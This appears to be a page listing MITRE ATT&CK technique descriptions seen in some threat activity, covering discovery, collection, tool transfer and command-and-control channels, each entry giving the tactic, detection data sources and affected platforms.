Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre